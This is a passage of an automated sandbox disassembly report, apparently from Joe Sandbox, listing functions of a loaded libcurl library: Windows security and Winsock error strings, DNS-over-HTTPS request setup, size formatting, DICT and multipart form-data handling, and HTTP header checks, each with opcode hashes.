                                                                                                                            • SEC_E_NO_PA_DATA, xrefs: 6B6F9CA8
                                                                                                                            • SEC_E_KDC_UNABLE_TO_REFER, xrefs: 6B6F9C26
                                                                                                                            • SEC_E_OUT_OF_SEQUENCE, xrefs: 6B6F9CC6
                                                                                                                            • SEC_E_INVALID_HANDLE, xrefs: 6B6F9BD6
                                                                                                                            • SEC_I_CONTEXT_EXPIRED, xrefs: 6B6F9E4C
                                                                                                                            • SEC_E_UNKNOWN_CREDENTIALS, xrefs: 6B6F9D7A
                                                                                                                            • SEC_E_NO_IP_ADDRESSES, xrefs: 6B6F9C94
                                                                                                                            • SEC_E_ILLEGAL_MESSAGE, xrefs: 6B6F9BA4
                                                                                                                            • SEC_E_SHUTDOWN_IN_PROGRESS, xrefs: 6B6F9D20
                                                                                                                            • SEC_I_SIGNATURE_NEEDED, xrefs: 6B6F9E6F
                                                                                                                            • SEC_E_ISSUING_CA_UNTRUSTED, xrefs: 6B6F9BF4
                                                                                                                            • SEC_E_ALGORITHM_MISMATCH, xrefs: 6B6F9AFA
                                                                                                                            • SEC_E_SECURITY_QOS_FAILED, xrefs: 6B6F9D16
                                                                                                                            • SEC_E_NOT_OWNER, xrefs: 6B6F9C6C
                                                                                                                            • SEC_E_KDC_UNKNOWN_ETYPE, xrefs: 6B6F9C30
                                                                                                                            • SEC_E_CRYPTO_SYSTEM_INVALID, xrefs: 6B6F9B68
                                                                                                                            • SEC_I_NO_LSA_CONTEXT, xrefs: 6B6F9E61
                                                                                                                            • SEC_I_LOCAL_LOGON, xrefs: 6B6F9E5A
                                                                                                                            • SEC_E_INCOMPLETE_MESSAGE, xrefs: 6B6F9BB8
                                                                                                                            • SEC_I_INCOMPLETE_CREDENTIALS, xrefs: 6B6F9E53
                                                                                                                            • SEC_E_REVOCATION_OFFLINE_C, xrefs: 6B6F9CF8
                                                                                                                            • SEC_E_QOP_NOT_SUPPORTED, xrefs: 6B6F9CEE
                                                                                                                            • SEC_E_BAD_PKGID, xrefs: 6B6F9B0E
                                                                                                                            • SEC_E_MULTIPLE_ACCOUNTS, xrefs: 6B6F9C58
                                                                                                                            • SEC_E_LOGON_DENIED, xrefs: 6B6F9C3A
                                                                                                                            • SEC_E_NO_TGT_REPLY, xrefs: 6B6F9CBC
                                                                                                                            • SEC_E_DOWNGRADE_DETECTED, xrefs: 6B6F9B90
                                                                                                                            • SEC_E_PKINIT_NAME_MISMATCH, xrefs: 6B6F9CDA
                                                                                                                            • SEC_E_DELEGATION_POLICY, xrefs: 6B6F9B7C
                                                                                                                            • SEC_E_CANNOT_INSTALL, xrefs: 6B6F9B22
                                                                                                                            • SEC_E_INSUFFICIENT_MEMORY, xrefs: 6B6F9BC2
                                                                                                                            • SEC_E_MESSAGE_ALTERED, xrefs: 6B6F9C4E
                                                                                                                            • SEC_E_UNSUPPORTED_FUNCTION, xrefs: 6B6F9D84
                                                                                                                            • SEC_E_TIME_SKEW, xrefs: 6B6F9D5C
                                                                                                                            • SEC_E_POLICY_NLTM_ONLY, xrefs: 6B6F9CE4
                                                                                                                            • SEC_E_DELEGATION_REQUIRED, xrefs: 6B6F9B86
                                                                                                                            • SEC_E_INCOMPLETE_CREDENTIALS, xrefs: 6B6F9BAE
                                                                                                                            • SEC_E_NO_CREDENTIALS, xrefs: 6B6F9C80
                                                                                                                            • SEC_E_MUST_BE_KDC, xrefs: 6B6F9C62
                                                                                                                            • SEC_E_CONTEXT_EXPIRED, xrefs: 6B6F9B54
                                                                                                                            • SEC_E_MAX_REFERRALS_EXCEEDED, xrefs: 6B6F9C44
                                                                                                                            • SEC_E_CANNOT_PACK, xrefs: 6B6F9B2C
                                                                                                                            • SEC_E_BUFFER_TOO_SMALL, xrefs: 6B6F9B18
                                                                                                                            • SEC_E_NO_S4U_PROT_SUPPORT, xrefs: 6B6F9CB2
                                                                                                                            • Unknown error, xrefs: 6B6F9E76
                                                                                                                            • SEC_E_KDC_CERT_REVOKED, xrefs: 6B6F9C12
                                                                                                                            • SEC_E_CERT_EXPIRED, xrefs: 6B6F9B36
                                                                                                                            • SEC_E_WRONG_PRINCIPAL, xrefs: 6B6F9DAC
                                                                                                                            • SEC_E_SMARTCARD_CERT_EXPIRED, xrefs: 6B6F9D2A
                                                                                                                            • SEC_I_COMPLETE_AND_CONTINUE, xrefs: 6B6F9E3E
                                                                                                                            • SEC_E_INVALID_TOKEN, xrefs: 6B6F9BEA
                                                                                                                            • SEC_E_DECRYPT_FAILURE, xrefs: 6B6F9B72
                                                                                                                            • SEC_E_UNTRUSTED_ROOT, xrefs: 6B6F9D98
                                                                                                                            • SEC_E_NO_AUTHENTICATING_AUTHORITY, xrefs: 6B6F9C76
                                                                                                                            • SEC_E_NO_KERB_KEY, xrefs: 6B6F9C9E
                                                                                                                            • SEC_E_CERT_UNKNOWN, xrefs: 6B6F9B40
                                                                                                                            • SEC_E_TOO_MANY_PRINCIPALS, xrefs: 6B6F9D66
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLast
                                                                                                                            • String ID: %s (0x%08X)$%s - %s$CRYPT_E_REVOKED$No error$SEC_E_ALGORITHM_MISMATCH$SEC_E_BAD_BINDINGS$SEC_E_BAD_PKGID$SEC_E_BUFFER_TOO_SMALL$SEC_E_CANNOT_INSTALL$SEC_E_CANNOT_PACK$SEC_E_CERT_EXPIRED$SEC_E_CERT_UNKNOWN$SEC_E_CERT_WRONG_USAGE$SEC_E_CONTEXT_EXPIRED$SEC_E_CROSSREALM_DELEGATION_FAILURE$SEC_E_CRYPTO_SYSTEM_INVALID$SEC_E_DECRYPT_FAILURE$SEC_E_DELEGATION_POLICY$SEC_E_DELEGATION_REQUIRED$SEC_E_DOWNGRADE_DETECTED$SEC_E_ENCRYPT_FAILURE$SEC_E_ILLEGAL_MESSAGE$SEC_E_ILLEGAL_MESSAGE (0x%08X) - This error usually occurs when a fatal SSL/TLS alert is received (e.g. handshake failed). More detail may be available in the Windows System event log.$SEC_E_INCOMPLETE_CREDENTIALS$SEC_E_INCOMPLETE_MESSAGE$SEC_E_INSUFFICIENT_MEMORY$SEC_E_INTERNAL_ERROR$SEC_E_INVALID_HANDLE$SEC_E_INVALID_PARAMETER$SEC_E_INVALID_TOKEN$SEC_E_ISSUING_CA_UNTRUSTED$SEC_E_ISSUING_CA_UNTRUSTED_KDC$SEC_E_KDC_CERT_EXPIRED$SEC_E_KDC_CERT_REVOKED$SEC_E_KDC_INVALID_REQUEST$SEC_E_KDC_UNABLE_TO_REFER$SEC_E_KDC_UNKNOWN_ETYPE$SEC_E_LOGON_DENIED$SEC_E_MAX_REFERRALS_EXCEEDED$SEC_E_MESSAGE_ALTERED$SEC_E_MULTIPLE_ACCOUNTS$SEC_E_MUST_BE_KDC$SEC_E_NOT_OWNER$SEC_E_NO_AUTHENTICATING_AUTHORITY$SEC_E_NO_CREDENTIALS$SEC_E_NO_IMPERSONATION$SEC_E_NO_IP_ADDRESSES$SEC_E_NO_KERB_KEY$SEC_E_NO_PA_DATA$SEC_E_NO_S4U_PROT_SUPPORT$SEC_E_NO_TGT_REPLY$SEC_E_OUT_OF_SEQUENCE$SEC_E_PKINIT_CLIENT_FAILURE$SEC_E_PKINIT_NAME_MISMATCH$SEC_E_POLICY_NLTM_ONLY$SEC_E_QOP_NOT_SUPPORTED$SEC_E_REVOCATION_OFFLINE_C$SEC_E_REVOCATION_OFFLINE_KDC$SEC_E_SECPKG_NOT_FOUND$SEC_E_SECURITY_QOS_FAILED$SEC_E_SHUTDOWN_IN_PROGRESS$SEC_E_SMARTCARD_CERT_EXPIRED$SEC_E_SMARTCARD_CERT_REVOKED$SEC_E_SMARTCARD_LOGON_REQUIRED$SEC_E_STRONG_CRYPTO_NOT_SUPPORTED$SEC_E_TARGET_UNKNOWN$SEC_E_TIME_SKEW$SEC_E_TOO_MANY_PRINCIPALS$SEC_E_UNFINISHED_CONTEXT_DELETED$SEC_E_UNKNOWN_CREDENTIALS$SEC_E_UNSUPPORTED_FUNCTION$SEC_E_UNSUPPORTED_PREAUTH$SEC_E_UNTRUSTED_ROOT$SEC_E_WRONG_CREDENTIAL_HANDLE$SEC_E_WRONG_PRINCIPAL$SEC_I_COMPLETE_AND_CONTINUE$SEC_I_COMPLETE_NEEDED$SEC_I_CONTEXT_EXPIRED$SEC_I_CONTINUE_NEEDED$SEC_I_INCOMPLETE_CREDENTIALS$SEC_I_LOCAL_LOGON$SEC_I_NO_LSA_CONTEXT$SEC_I_RENEGOTIATE$SEC_I_SIGNATURE_NEEDED$Unknown error
                                                                                                                            • API String ID: 1452528299-1081713384
                                                                                                                            • Opcode ID: e948db290bbc8d0a72c552edae0429881390f1c0037f319d7eea48625e255475
                                                                                                                            • Instruction ID: 18cb16af341e6423d3a4ded4d9fb5863a8eba9a3ecd7422ceaadbf96e0a3779e
                                                                                                                            • Opcode Fuzzy Hash: e948db290bbc8d0a72c552edae0429881390f1c0037f319d7eea48625e255475
                                                                                                                            • Instruction Fuzzy Hash: D091EFF0689924D7C6308D5C9BC15D5726F6F02BC9B0A4962F9238F2ABC62DCD4747A3
                                                                                                                            Function 6B6FA820 Relevance: 89.4, APIs: 1, Strings: 50, Instructions: 139COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _strncpy
                                                                                                                            • String ID: Address already in use$Address family not supported$Address not available$Bad access$Bad argument$Bad file$Bad message size$Bad protocol$Bad quota$Blocking call in progress$Call interrupted$Call would block$Connection refused$Connection was aborted$Connection was reset$Descriptor is not a socket$Disconnected$Host down$Host not found$Host not found, try again$Host unreachable$Invalid arguments$Loop??$Name too long$Need destination address$Network down$Network has been reset$Network unreachable$No buffer space$No data record of requested type$Not empty$Operation not supported$Out of file descriptors$Process limit reached$Protocol family not supported$Protocol is unsupported$Protocol option is unsupported$Remote error$Socket has been shut down$Socket is already connected$Socket is not connected$Socket is unsupported$Something is stale$Timed out$Too many references$Too many users$Unrecoverable error in call to nameserver$Winsock library is not ready$Winsock library not initialised$Winsock version not supported
                                                                                                                            • API String ID: 2961919466-3442644082
                                                                                                                            • Opcode ID: 1540ed2826ea47ff9126fbfbed99597cf66a80b85943dec6d40a9e6e94c42374
                                                                                                                            • Instruction ID: b10f97e32fc5da0e665f3331dba07784e358bf4e770f8bbd3c4eac74134c313e
                                                                                                                            • Opcode Fuzzy Hash: 1540ed2826ea47ff9126fbfbed99597cf66a80b85943dec6d40a9e6e94c42374
                                                                                                                            • Instruction Fuzzy Hash: 554163A138C3298BA234081D57122D3213F6702A90784EDBBB984EF352F41FD84F4396
                                                                                                                            Function 6B6EE610 Relevance: 61.7, APIs: 33, Strings: 2, Instructions: 499COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • ___from_strstr_to_strchr.LIBCMT ref: 6B6EE683
                                                                                                                            • curl_maprintf.LIBCURL(%s?dns=%s,00000000,?,?,?,?,?,?,00000000,?,?,?), ref: 6B6EE753
                                                                                                                            • curl_easy_setopt.LIBCURL(00000000,00002712,00000000,?,?,?,?,00000000,?,?,?), ref: 6B6EE806
                                                                                                                            • curl_easy_setopt.LIBCURL(00000000,00004E2B,6B6EE5E0,?,?,?,?,?,?,?,00000000,?,?,?), ref: 6B6EE825
                                                                                                                            • curl_easy_setopt.LIBCURL(00000000,00002711,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6B6EE849
                                                                                                                            • curl_easy_setopt.LIBCURL(00000000,0000271F,?), ref: 6B6EE86F
                                                                                                                            • curl_easy_setopt.LIBCURL(00000000,0000003C,?), ref: 6B6EE88C
                                                                                                                            • curl_easy_setopt.LIBCURL(00000000,00002727,?), ref: 6B6EE8A9
                                                                                                                            • curl_easy_setopt.LIBCURL(00000000,000000B5,00000002), ref: 6B6EE8C5
                                                                                                                            • curl_easy_setopt.LIBCURL(00000000,0000009B,?), ref: 6B6EE8E2
                                                                                                                            • curl_easy_setopt.LIBCURL(00000000,00000029,00000001), ref: 6B6EE903
                                                                                                                            • curl_easy_setopt.LIBCURL(00000000,00000063,00000001), ref: 6B6EE925
                                                                                                                            • curl_easy_setopt.LIBCURL(00000000,000000E9,00000001), ref: 6B6EE94A
                                                                                                                            • curl_easy_setopt.LIBCURL(00000000,00000051,00000002), ref: 6B6EE96C
                                                                                                                            • curl_easy_setopt.LIBCURL(00000000,000000F9,00000002), ref: 6B6EE991
                                                                                                                            • curl_easy_setopt.LIBCURL(00000000,000000F8,00000001), ref: 6B6EE9B6
                                                                                                                            • curl_easy_setopt.LIBCURL(00000000,00002806,?), ref: 6B6EE9DB
                                                                                                                            • curl_easy_setopt.LIBCURL(00000000,00002814,?), ref: 6B6EEA00
                                                                                                                            • curl_easy_setopt.LIBCURL(00000000,00000105,00000008), ref: 6B6EEA32
                                                                                                                            • curl_easy_setopt.LIBCURL(00000000,00002807,?), ref: 6B6EEA57
                                                                                                                            • curl_easy_setopt.LIBCURL(00000000,00000040,00000001), ref: 6B6EEA79
                                                                                                                            • curl_easy_setopt.LIBCURL(00000000,000000E8,00000001), ref: 6B6EEA9E
                                                                                                                            • curl_easy_setopt.LIBCURL(00000000,00002751,?), ref: 6B6EEAC3
                                                                                                                            • curl_easy_setopt.LIBCURL(00000000,00002771,?), ref: 6B6EEAE8
                                                                                                                            • curl_easy_setopt.LIBCURL(00000000,000027B9,?), ref: 6B6EEB0D
                                                                                                                            • curl_easy_setopt.LIBCURL(00000000,000000AC,00000001), ref: 6B6EEB32
                                                                                                                            • curl_easy_setopt.LIBCURL(00000000,0000275C,?), ref: 6B6EEB57
                                                                                                                            • curl_easy_setopt.LIBCURL(00000000,0000275D,?), ref: 6B6EEB7C
                                                                                                                            • curl_easy_setopt.LIBCURL(00000000,000000D8,00000008), ref: 6B6EEBAE
                                                                                                                            • curl_easy_setopt.LIBCURL(00000000,00004E8C,?), ref: 6B6EEBD3
                                                                                                                            • curl_easy_setopt.LIBCURL(00000000,0000277D,?), ref: 6B6EEBF8
                                                                                                                            • curl_easy_setopt.LIBCURL(00000000,0000283A,?), ref: 6B6EEC1D
                                                                                                                            • curl_multi_add_handle.LIBCURL(?,00000000), ref: 6B6EEC4E
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: curl_easy_setopt$___from_strstr_to_strchrcurl_maprintfcurl_multi_add_handle
                                                                                                                            • String ID: %s?dns=%s$Failed to encode DOH packet [%d]
                                                                                                                            • API String ID: 667061265-3030351490
                                                                                                                            • Opcode ID: a22d997916c36ad3c20ce99d08b5a1a96d8e00a63b6c688175f4714f654dbcc7
                                                                                                                            • Instruction ID: a89c8b624700f70d188bbc86a5223f05b78fbdb8419fa4a9fe876ba460f7344b
                                                                                                                            • Opcode Fuzzy Hash: a22d997916c36ad3c20ce99d08b5a1a96d8e00a63b6c688175f4714f654dbcc7
                                                                                                                            • Instruction Fuzzy Hash: E6F13AF1E49311BBEF228A70CD42B8A77A6AF00750F0501A1ED547B391D7AE8E52C7E1
                                                                                                                            Function 6B6ED000 Relevance: 47.5, APIs: 19, Strings: 8, Instructions: 204COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • curl_msnprintf.LIBCURL(?,00000006,%5I64d,?,?,71935E00,6B6D1696,?,6B6ED8FE,0B2083C7,00000000,?), ref: 6B6ED02A
                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B6ED053
                                                                                                                            • curl_msnprintf.LIBCURL(?,00000006,%4I64dk,00000000,?,?,?,00000400,00000000,71935E00,6B6D1696,?,6B6ED8FE,0B2083C7,00000000,?), ref: 6B6ED065
                                                                                                                            • __allrem.LIBCMT ref: 6B6ED08A
                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B6ED098
                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B6ED0A8
                                                                                                                            • curl_msnprintf.LIBCURL(?,00000006,%2I64d.%0I64dM,00000000,?,?,?,00100000,00000000,00000000,?,00000000,?,00019999,00000000,?), ref: 6B6ED0BA
                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B6ED0E0
                                                                                                                            • curl_msnprintf.LIBCURL(?,00000006,%4I64dM,00000000,?,?,?,00100000,00000000,71935E00,6B6D1696,?,6B6ED8FE,0B2083C7,00000000,?), ref: 6B6ED0F2
                                                                                                                            • __allrem.LIBCMT ref: 6B6ED114
                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B6ED122
                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B6ED132
                                                                                                                            • curl_msnprintf.LIBCURL(?,00000006,%2I64d.%0I64dG,00000000,?,?,?,40000000,00000000,00000000,?,00000000,?,06666666,00000000,?), ref: 6B6ED144
                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B6ED169
                                                                                                                            • curl_msnprintf.LIBCURL(?,00000006,%4I64dG,00000000,?,?,?,40000000,00000000,71935E00,6B6D1696,?,6B6ED8FE,0B2083C7,00000000,?), ref: 6B6ED17B
                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B6ED1A0
                                                                                                                            • curl_msnprintf.LIBCURL(?,00000006,%4I64dT,00000000,?,?,?,00000000,00000100,71935E00,6B6D1696,?,6B6ED8FE,0B2083C7,00000000,?), ref: 6B6ED1B2
                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B6ED1C9
                                                                                                                            • curl_msnprintf.LIBCURL(?,00000006,%4I64dP,00000000,?,?,?,00000000,00040000,71935E00,6B6D1696,?,6B6ED8FE,0B2083C7,00000000,?), ref: 6B6ED1DB
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$curl_msnprintf$__allrem
                                                                                                                            • String ID: %2I64d.%0I64dG$%2I64d.%0I64dM$%4I64dG$%4I64dM$%4I64dP$%4I64dT$%4I64dk$%5I64d
                                                                                                                            • API String ID: 3299120379-2102732564
                                                                                                                            • Opcode ID: 09856a2576b86e61cd0282bcf7489cc1b07a58a646f57b61b35e4f2128f1b02e
                                                                                                                            • Instruction ID: 3683cb1c6079ac8106604fef5f754f9c2917166458aa031fecde3dbc0d4b7674
                                                                                                                            • Opcode Fuzzy Hash: 09856a2576b86e61cd0282bcf7489cc1b07a58a646f57b61b35e4f2128f1b02e
                                                                                                                            • Instruction Fuzzy Hash: 6341D3E7BC666436E63068682C12FEF232DDBC1B59F150429FB08BB181965C691343FD
                                                                                                                            Function 6B6C9190 Relevance: 35.3, APIs: 8, Strings: 12, Instructions: 277COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • ___from_strstr_to_strchr.LIBCMT ref: 6B6C9245
                                                                                                                            • ___from_strstr_to_strchr.LIBCMT ref: 6B6C92AB
                                                                                                                            • ___from_strstr_to_strchr.LIBCMT ref: 6B6C92BD
                                                                                                                            • ___from_strstr_to_strchr.LIBCMT ref: 6B6C92D1
                                                                                                                            • ___from_strstr_to_strchr.LIBCMT ref: 6B6C9364
                                                                                                                            • ___from_strstr_to_strchr.LIBCMT ref: 6B6C9376
                                                                                                                            • ___from_strstr_to_strchr.LIBCMT ref: 6B6C938A
                                                                                                                            • ___from_strstr_to_strchr.LIBCMT ref: 6B6C939F
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ___from_strstr_to_strchr
                                                                                                                            • String ID: /D:$/DEFINE:$/FIND:$/LOOKUP:$/M:$/MATCH:$CLIENT libcurl 7.73.0%sQUIT$CLIENT libcurl 7.73.0DEFINE %s %sQUIT$CLIENT libcurl 7.73.0MATCH %s %s %sQUIT$Failed sending DICT request$default$lookup word is missing
                                                                                                                            • API String ID: 601868998-3098048912
                                                                                                                            • Opcode ID: 57b62015b3da2a9492dd9b129731ce53d0c4faadc05a2fbbb7698151238e12e4
                                                                                                                            • Instruction ID: 2deffe292048f0bccb23b42d92d3e7cbda79915d41f72bf752199a02c0f08670
                                                                                                                            • Opcode Fuzzy Hash: 57b62015b3da2a9492dd9b129731ce53d0c4faadc05a2fbbb7698151238e12e4
                                                                                                                            • Instruction Fuzzy Hash: B87139A2E0420467D7130A755D42B9B3BA8DF9275EF1441E4FC486A3C3FB2E9A1582A3
                                                                                                                            Function 6B6E2B70 Relevance: 33.5, APIs: 2, Strings: 17, Instructions: 282COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • curl_slist_free_all.LIBCURL(?,00000000,?,?,multipart/form-data), ref: 6B6E2B8F
                                                                                                                            • curl_strequal.LIBCURL(?,attachment,?,?,?,multipart/form-data), ref: 6B6E2CCC
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: curl_slist_free_allcurl_strequal
                                                                                                                            • String ID: 8bit$; boundary=$; filename="$; name="$Content-Disposition$Content-Disposition: %s%s%s%s%s%s%s$Content-Transfer-Encoding$Content-Transfer-Encoding: %s$Content-Type$Content-Type: %s%s%s$application/octet-stream$attachment$form-data$multipart/$multipart/form-data$multipart/mixed$text/plain
                                                                                                                            • API String ID: 3213019040-1595554923
                                                                                                                            • Opcode ID: 74e373a76c39cf70e9f2cf1796d8c1a6cdf2a159afba9490d91f8afafd8889e7
                                                                                                                            • Instruction ID: f5de4fc86aa92ba6125ab3e89ad13a47d2a555bf25a7a816d55627d5f6b6569f
                                                                                                                            • Opcode Fuzzy Hash: 74e373a76c39cf70e9f2cf1796d8c1a6cdf2a159afba9490d91f8afafd8889e7
                                                                                                                            • Instruction Fuzzy Hash: 3091E3F1A0AB039BDB118E29CE8165777FBAF84758B00487DE9459B610E77CE9068B60
                                                                                                                            Function 6B6DAA80 Relevance: 33.5, APIs: 10, Strings: 9, Instructions: 269COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • ___from_strstr_to_strchr.LIBCMT ref: 6B6DAB26
                                                                                                                            • ___from_strstr_to_strchr.LIBCMT ref: 6B6DAB3C
                                                                                                                            • curl_strnequal.LIBCURL(Host:,00000000,00000005), ref: 6B6DAC1A
                                                                                                                            • curl_strnequal.LIBCURL(Content-Type:,00000000,0000000D), ref: 6B6DAC3E
                                                                                                                            • curl_strnequal.LIBCURL(Content-Type:,00000000,0000000D), ref: 6B6DAC62
                                                                                                                            • curl_strnequal.LIBCURL(Content-Length:,00000000,0000000F), ref: 6B6DAC86
                                                                                                                            • curl_strnequal.LIBCURL(Connection:,00000000,0000000B), ref: 6B6DACAA
                                                                                                                            • curl_strnequal.LIBCURL(Transfer-Encoding:,00000000,00000012), ref: 6B6DACCE
                                                                                                                            • curl_strnequal.LIBCURL(Authorization:,00000000,0000000E), ref: 6B6DACE2
                                                                                                                            • curl_strnequal.LIBCURL(Cookie:,00000000,00000007,?,?,?,?,?,?,6B6DE55E), ref: 6B6DACF6
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: curl_strnequal$___from_strstr_to_strchr
                                                                                                                            • String ID: %s$Authorization:$Connection:$Content-Length:$Content-Type:$Cookie:$Host:$Transfer-Encoding:$^mk
                                                                                                                            • API String ID: 431725195-1466906702
                                                                                                                            • Opcode ID: e5cb89bf1b74a4e10ab1bc81075281ccdf689a179895e172b6a26c8465a489e5
                                                                                                                            • Instruction ID: fc7ba2dadbec0029ff69b9d7ee4f31f2c045188a68b489011da4448a887bb241
                                                                                                                            • Opcode Fuzzy Hash: e5cb89bf1b74a4e10ab1bc81075281ccdf689a179895e172b6a26c8465a489e5
                                                                                                                            • Instruction Fuzzy Hash: 91913AF1D0D2056FEB118F64DA04B963BB69F01358F0841F4EE589B242E77EDA52CB91
                                                                                                                            Function 6B6ED510 Relevance: 31.8, APIs: 15, Strings: 3, Instructions: 350COMMON
                                                                                                                            Download Yara Rule
